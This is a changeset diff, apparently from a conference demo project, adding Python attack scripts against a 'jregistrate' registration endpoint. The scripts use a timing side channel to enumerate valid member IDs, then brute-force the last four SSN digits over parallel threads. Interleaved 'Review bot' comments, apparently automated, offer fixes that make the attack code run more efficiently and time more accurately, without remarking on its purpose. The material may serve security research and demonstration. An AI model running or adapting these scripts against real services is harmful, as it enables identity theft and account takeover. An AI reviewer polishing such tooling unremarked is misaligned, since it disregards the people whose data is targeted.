Changeset 18
- Timestamp:
- 08/01/15 19:04:49 (9 years ago)
- Files:
-
- 2 added
- 2 edited
test/blackhat-demo/jregistrate-attack
r15 r18 43 43 parser.add_argument('port', nargs='?', type=int, default=8080, 44 44 help='TCP port number of HTTP service (default: 8080)') 45 parser.add_argument('guess', nargs='?', type=str, default=None, 46 help='Retry a member_id guess') 45 47 options = parser.parse_args() 46 48 … … 75 77 session = requests.Session() 76 78 response = session.send(req, verify=False) 77 #print(repr(response.raw._original_response.local_address))78 79 reported = extractReportedRuntime(response.headers, response.text) 79 80 retry = False … … 82 83 time.sleep(1.0) 83 84 sys.stderr.write("ERROR: retrying...\n") 84 #print(data.encode('utf-8'), reported)85 85 86 86 return {'userspace_rtt':response.elapsed.microseconds*1000, … … 103 103 104 104 105 def guessSSN(member_id, last_four): 106 method = 'POST' 107 path = '/jregistrate/register' 108 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 109 headers = {"Content-Type":"application/x-www-form-urlencoded"} 110 body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321') 111 req = requests.Request(method, url, headers=headers, data=body).prepare() 112 session = requests.Session() 113 response = session.send(req, verify=False) 114 115 if 'Bad password' in response.text: 116 return True 117 else: 118 return False 119 120 121 def bruteSSN(member_id): 122 from nanownlib.parallel import WorkerThreads 123 wt = WorkerThreads(4, guessSSN) 124 125 for last_four in range(9999): 126 ssn = "%4d" % last_four 127 wt.addJob(ssn, (member_id,ssn)) 128 129 for i in range(9999): 130 ssn,success = wt.resultq.get() 131 if success: 132 wt.stop() 133 return ssn 134 135 wt.stop() 136 return None 137 138 105 139 setCPUAffinity() 106 140 setTCPTimestamps() … … 109 143 110 144 cases = {"invalid":"0012-9999"} 111 guesses = [("0012-% d"%id) for id in range(0,9999) if id != 2019]145 guesses = [("0012-%04d"%id) for id in range(0,9999) if id != 2019] 112 146 random.shuffle(guesses) 113 
num_observations = 100147 num_observations = 250 114 148 trim = (0,0) 115 classifier = " septasummary"116 params = {"distance": 25, "threshold": 40094.274}149 classifier = "quadsummary" 150 params = {"distance": 5, "threshold": 18761.53575} 117 151 classifierTest = functools.partial(classifiers[classifier]['test'], params, True) 118 152 153 if options.guess != None: 154 guesses = [options.guess] 119 155 120 156 sid = findMaxSampleID(db) + 1 121 157 for guess in guesses: 122 158 print("Collecting samples for:", guess) 159 start = time.time() 123 160 cases["valid"] = guess 124 stype = "attack_%s " % guess161 stype = "attack_%s_%d" % (guess, int(time.time()*1000)) 125 162 sample_order = list(cases.items()) 126 163 … … 147 184 sniffer_fp.close() 148 185 num_probes = analyzeProbes(db, trim=trim) 149 print("num_probes: ", num_probes)150 186 151 187 if classifierTest(db.subseries(stype, "valid")): 152 print("Found valid member_id: ", guess) 153 break 154 155 156 def guessSSN(member_id, last_four): 157 method = 'POST' 158 path = '/jregistrate/register' 159 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 160 headers = {"Content-Type":"application/x-www-form-urlencoded"} 161 body = (b'member_id='+member_id.encode('utf-8')+b'&last_four='+last_four.encode('utf-8')+b'&username=bob&password=1234&conf_pwd=4321') 162 req = requests.Request(method, url, headers=headers, data=body).prepare() 163 session = requests.Session() 164 response = session.send(req, verify=False) 165 166 if 'Bad password' in response.text: 167 return True 188 print(" Looks valid...") 189 ssn = bruteSSN(guess) 190 if ssn == None: 191 print(" Hmm, didn't find an SSN... ") 192 else: 193 print(" W00t! 
Found SSN: %s" % ssn) 168 194 else: 169 return False 170 171 172 print(guessSSN('0012-5969', '4298')) 173 sys.exit(0) 174 175 for last_four in range(9999): 176 if guessSSN(guess, "%4d" % last_four): 177 print("Found valid SSN last four digits:", last_four) 178 break 195 print(" Looks invalid") 196 print(" Runtime: ", time.time()-start) -
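Review bot: guessSSN (new lines 105–119) creates a `requests.Session()` on every call and never closes it, and bruteSSN (new lines 121–136) now queues close to ten thousand of those calls over four worker threads, so each call leaves a connection pool behind until it is garbage-collected. Scoping the session, `with requests.Session() as session:` followed by `response = session.send(req, verify=False)`, releases it when the call returns. The trailing `if`/`else` can be reduced to `return 'Bad password' in response.text`, and the new `options.guess != None` and `ssn == None` tests read better as `is not None` / `is None`. Neither function has a docstring; a one-line summary stating the boolean return of guessSSN and the string-or-None return of bruteSSN would help.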
test/blackhat-demo/jregistrate-collect
r15 r18 34 34 parser = argparse.ArgumentParser( 35 35 description="") 36 parser.add_argument('-c', dest='cases', type=str, default='{"valid":"0012-5969","invalid":"0012-9999"}', 37 help='JSON representation of echo timing cases.') 38 parser.add_argument('--no-tcpts', action='store_true', help='Disbale TCP timestamp profiling') 36 parser.add_argument('--no-tcpts', action='store_true', help='Disable TCP timestamp profiling') 39 37 parser.add_argument('--no-control', action='store_true', help='Do not collect separate control data. Instead, synthesize it from test and train data.') 40 38 parser.add_argument('session_name', default=None, … … 55 53 protocol = 'http' 56 54 57 cases = json.loads(options.cases)55 cases = {"valid":"0012-8846","invalid":"0012-9999"} 58 56 59 57 … … 69 67 70 68 71 def sendRequest( data=None):69 def sendRequest(case_data): 72 70 method = 'POST' 73 71 path = '/jregistrate/register' 74 72 url = "%s://%s:%d%s" % (protocol,hostname,port,path) 75 73 headers = {"Content-Type":"application/x-www-form-urlencoded"} 76 body = (b'member_id='+ data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=')74 body = (b'member_id='+case_data.encode('utf-8')+b'&last_four=1111&zip_code=97219&username=bob&password=&conf_pwd=') 77 75 req = requests.Request(method, url, headers=headers, data=body).prepare() 78 76 … … 82 80 session = requests.Session() 83 81 response = session.send(req, verify=False) 84 #print(repr(response.raw._original_response.local_address))85 82 reported = extractReportedRuntime(response.headers, response.text) 86 83 retry = False … … 89 86 time.sleep(1.0) 90 87 sys.stderr.write("ERROR: retrying...\n") 91 #print(data.encode('utf-8'), reported)92 88 93 89 return {'userspace_rtt':response.elapsed.microseconds*1000, … … 170 166 sample_order[i] = (sample_order[i][0],sample_order[0][1]) 171 167 random.shuffle(sample_order) 172 #print('after', sample_order)173 168 174 169 results = [] … … 179 174 sample_order[i][1])) 180 
175 181 #print(results)182 176 db.addProbes(results) 183 177 db.conn.commit() … … 185 179 186 180 if (time.time() > next_report): 187 #s = time.time()188 181 reportProgress(db, sample_types, start) 189 #print("reportProgress time:", time.time()-s)190 182 next_report += report_interval 191 183 … … 194 186 stopSniffer(sniffer) 195 187 196 start = time.time()197 188 associatePackets(sniffer_fp, db) 198 189 sniffer_fp.close() 199 end = time.time()200 print("associate time:", end-start)201 190 202 191 if options.no_control:
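Review bot: The `'userspace_rtt':response.elapsed.microseconds*1000` expression left as context at new line 89 reads only the sub-second component of the timedelta, so a response that takes one second or longer is recorded with its whole seconds dropped. `int(response.elapsed.total_seconds()*1e9)` keeps the full duration, assuming the field is meant to hold nanoseconds. The same expression appears in jregistrate-attack at new line 86. In both files the enclosing function and the returned dict continue outside the visible hunk.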